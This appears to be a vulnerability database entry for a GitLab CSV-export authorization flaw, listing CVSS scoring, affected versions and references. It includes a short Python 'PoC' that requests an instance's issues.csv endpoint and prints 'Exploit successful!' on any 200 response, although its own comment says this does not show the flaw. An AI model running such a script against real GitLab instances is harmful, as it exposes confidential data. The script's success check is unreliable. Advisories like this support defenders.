Security Vulnerability Report
CVE-2026-2104 CVSS 4.3 MEDIUM

CVE-2026-2104

Published: 2026-04-08 23:16:58
Last Modified: 2026-04-14 16:57:57

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to access confidential issues assigned to other users via CSV export due to insufficient authorization checks.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Exploitability Score: 2.8
Impact Score: 1.4

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (versions from 18.2.0 up to, but excluding, 18.8.9)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (versions from 18.9.0 up to, but excluding, 18.9.5)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (versions from 18.10.0 up to, but excluding, 18.10.3)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (versions from 18.2.0 up to, but excluding, 18.8.9)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (versions from 18.9.0 up to, but excluding, 18.9.5)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (versions from 18.10.0 up to, but excluding, 18.10.3)
GitLab 18.2 up to, but not including, 18.8.9
GitLab 18.9 up to, but not including, 18.9.5
GitLab 18.10 up to, but not including, 18.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_url = "https://your-gitlab-instance.com"
token = "YOUR_PRIVATE_TOKEN"
project_id = "123"

# Headers for authentication
headers = {"PRIVATE-TOKEN": token}

# The vulnerable endpoint for exporting issues as CSV
# Vulnerability allows accessing confidential issues assigned to others
url = f"{target_url}/api/v4/projects/{project_id}/issues.csv"

try:
    response = requests.get(url, headers=headers, timeout=30)
    if response.status_code == 200:
        # Note: a 200 response only means the export request was accepted;
        # it does not by itself demonstrate the authorization flaw.
        print("[+] Exploit successful! CSV data received.")
        print("[+] Data preview:")
        print(response.text[:500])  # Print first 500 chars
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ (Vendor Advisory, Release Notes)
https://gitlab.com/gitlab-org/gitlab/-/work_items/589021 (Broken Link)
https://hackerone.com/reports/3541476 (Permissions Required)

Record Details

Weakness: CWE-639 (listed as the primary weakness in the record)
Record status: Analyzed